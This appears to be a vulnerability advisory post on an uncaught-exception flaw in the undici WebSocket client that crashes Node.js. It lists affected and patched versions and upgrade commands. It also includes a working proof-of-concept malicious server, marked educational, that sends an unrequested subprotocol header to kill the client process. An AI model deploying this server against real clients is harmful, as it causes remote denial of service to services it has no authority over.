Listen to this Post
undici WebSocket client performs opening handshake.
Client sends HTTP Upgrade request.
Default new WebSocket(url) requests no subprotocol.
Server responds 101 Switching Protocols.
Response may include Sec-WebSocket-Protocol.
Client compares returned subprotocol.
If header was not requested, client must fail connection.
Vulnerable code instead throws TypeError.
Throw occurs during handshake processing.
Throw is inside queueMicrotask callback.
Callback lacks surrounding try/catch.
Exception becomes uncaught.
Node.js uncaught exception terminates process.
Attack requires attacker-controlled WebSocket server.
Also compromised server can trigger.
Plaintext ws:// MITM can inject header.
Attack is remote.
Attack is unauthenticated.
No user interaction required beyond opening socket.
Affected default usage: new WebSocket(url).
No subprotocol argument passed.
Affected versions start at undici 6.7.0.
6.x affected before 6.28.1.
7.x affected before 7.29.1.
8.x affected before 8.10.2.
Patched versions are 6.28.1, 7.29.1, 8.10.2.
RFC 6455 section 4.1 requires failing connection.
It does not permit crashing process.
No workaround exists.
Fix requires upgrade.
DailyCVE Form:
Platform: undici WebSocket client
Version: 6.7.0-6.28.0 7.0.0-7.29.0 8.0.0-8.10.1
Vulnerability: Uncaught TypeError handshake
Severity: High
date: Sep 4 2026
Prediction: 2026-09-29
(end of form)
What Undercode Say:
Analytics
npm view undici versions --json npm view [email protected] version npm view [email protected] version npm view [email protected] version npm ls undici npm audit --omit=dev grep -R "Sec-WebSocket-Protocol" node_modules/undici/lib node -e "const {WebSocket}=require('undici'); new WebSocket('ws://127.0.0.1:8080')"
Exploit: (Educational Purposes!)
const http = require('http');
const crypto = require('crypto');
const server = http.createServer();
server.on('upgrade', (req, socket) => {
const key = req.headers['sec-websocket-key'];
const accept = crypto.createHash('sha1')
.update(key + '258EAFA5-E914-47DA-95CA-C5AB0DC85B11')
.digest('base64');
socket.write(
'HTTP/1.1 101 Switching Protocols\r\n' +
'Upgrade: websocket\r\n' +
'Connection: Upgrade\r\n' +
'Sec-WebSocket-Accept: ' + accept + '\r\n' +
'Sec-WebSocket-Protocol: chat\r\n' +
'\r\n'
);
});
server.listen(8080);
const { WebSocket } = require('undici');
new WebSocket('ws://127.0.0.1:8080');
node server.js node client.js
Protection: from this CVE
npm install [email protected] npm install [email protected] npm install [email protected]
{
"overrides": {
"undici": "8.10.2"
}
}
npm audit fix
Impact:
Remote unauthenticated denial of service.
Node.js process termination.
Default new WebSocket(url).
Attacker-controlled, compromised, or plaintext ws:// MITM server.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

